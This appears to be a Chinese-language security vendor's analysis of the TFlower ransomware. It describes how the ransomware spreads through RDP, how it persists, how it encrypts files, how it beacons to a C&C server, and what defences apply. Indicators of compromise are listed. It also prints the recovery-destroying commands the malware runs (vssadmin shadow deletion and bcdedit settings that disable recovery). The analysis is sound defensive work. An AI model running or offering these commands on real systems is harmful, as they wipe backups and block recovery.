攻击目标主要为企业网络的勒索病毒——TFlower - 瑞星网

2023-04-25 00:24:18

攻击目标主要为企业网络的勒索病毒——TFlower

2019-11-06   

威胁等级:★★★★
TFlower勒索病毒主要锁定企业环境,通过未得到安全保护的远程桌面服务(RDP)传播。一旦攻击者获得对目标机器的访问权限,就会使用PowerShell Empire、PSExec等工具遍历企业网络。

背景介绍

TFlower勒索病毒。

目标锁定企业环境的最新勒索软件被命名为“TFlower”,该病毒正通过未得到安全保护的远程桌面服务(RDP)传播。一旦攻击者获得对目标机器的访问权限,就会使用PowerShell Empire、PSExec等工具遍历企业网络,也就是说,它是在攻击者通过RDP服务侵入受害者电脑后手动安装的。

据外媒BleepingComputer报道,这种新型勒索软件实际上是由白帽黑客GrujaRS在上个月初发现的,但直到最近才开始大规模爆发,一些企业和政府机构已经遭到感染。

图:勒索背景

病毒加密完文件后会弹出勒索框,目前尚不清楚该勒索软件的具体赎金金额:

图:勒索框

病毒运行后,会高调运行控制台程序,并将加密过程显示出来:

图:病毒运行过程显示

该病毒会加密几乎所有文件类型(.dll除外),加密后的文件名和后缀名不变,而是在文件内容头部添加*tflower标记和经过加密的密钥数据:

图:被加密文件结构

病毒MD5:53C923D4E39B966AB951F9A3B9D090BE

威胁等级:★★★★

病毒演示视频

技术分析

· 枚举进程

查找并杀死Outlook.exe进程,以便允许打开其数据文件进行加密。

图:查杀指定进程

· 注册表操作

病毒为了长期驻留,将自身添加在启动项中'Software\Microsoft\Windows\CurrentVersion\Run\proxycap'

图:注册表添加启动项

· 关闭恢复功能

清空磁盘回收站,并尝试删除卷影副本、执行禁用Windows 10修复环境的命令。

vssadmin.exe delete shadows /all /quiet 		
bcdedit.exe /set {default} recoveryenabled no 	
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures 
bcdedit.exe /set {current} recoveryenabled no 		
bcdedit.exe /set {current} bootstatuspolicy ignoreallfailures
图:关闭恢复功能

· 网络操作

创建线程与C&C服务器进行通讯,连接至 89.46.108.47:443或者89.46.108.47:80,将受害电脑名及病毒运行状态进行上传,其中状态分为'start'、'success %lld, retry %lld'、'End %lld' 上传数据格式为:https://www.adamaitalycup.it/wp-includes/wp-merge.php?name=[computer_name]&state=运行状态

图:上传信息

· 文件操作

遍历文件时跳过指定目录文件:'sample music'、'windows'、'!_Notice__!.txt'

图:遍历文件

选择被加密文件时跳过自身以及后缀名为.dll的文件:

图:选择文件类型

病毒会加密文件的全部数据,同时在文件内容头部添加*tflower标记、文件大小以及经过加密的密钥数据:

图:加密文件结构

· 加密算法

文件加密算法采用AES-256-CBC算法,其中key、IV采用RSA-512公钥进行加密,存储在被加密文件头部,而RSA公钥采用十六进制转字符串方式硬编码在病毒文件中。

图:加密算法为aes-256-cbc

硬编码的RSA公钥转换前(1024字节):

图:RSA公钥转码前

通过字符串转十六进制后的公钥数据(512字节):

图:RSA-512公钥

防范措施

  1. 不下载可疑邮件附件
  2. 浏览网页时不下载运行可疑程序
  3. 及时更新系统补丁
  4. 不适用弱口令密码
  5. 安装杀毒软件
  6. 安装勒索病毒防御软件
编辑:瑞瑞 阅读:

Copyright © 2023 All Rights Reserved 版权所有 美食佳肴网